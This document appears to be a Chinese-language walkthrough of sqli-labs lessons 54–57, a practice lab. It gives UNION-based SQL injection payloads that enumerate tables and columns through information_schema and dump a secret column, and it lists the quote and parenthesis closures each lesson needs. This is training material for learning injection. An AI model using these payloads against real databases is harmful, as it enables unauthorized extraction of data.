Less54,55,56,57【由库名逆向key】
思路:从给的库名推出表名,在推出列名,之后查看每列数据进行测试,找到key
表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES' --+
列名
group_concat(column_name) from information_schema.columns where table_name='7m7i6xs91c' --+
获取到列名"id,sessid,secret_4RFT,tryy"
之后查看每一列的数据,找到密码
错误:group_concat(id) from CHALLENGES.7m7i6xs91c--+
正确:group_concat(secret_4RFT) from CHALLENGES.7m7i6xs91c--+
Less55
Less55与54不同在于id参数闭合符号为 ( )
表名
http://127.0.0.1/sqli-labs-master/Less-55/?id=-1)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27CHALLENGES%27--+
列名
group_concat(column_name) from information_schema.columns where table_name='4m9j52gi3z' --+
每列数据
group_concat(secret_1DAK) form CHALLENGES.4m9j52gi3z--+
56闭合符号为('')
57闭合符号为""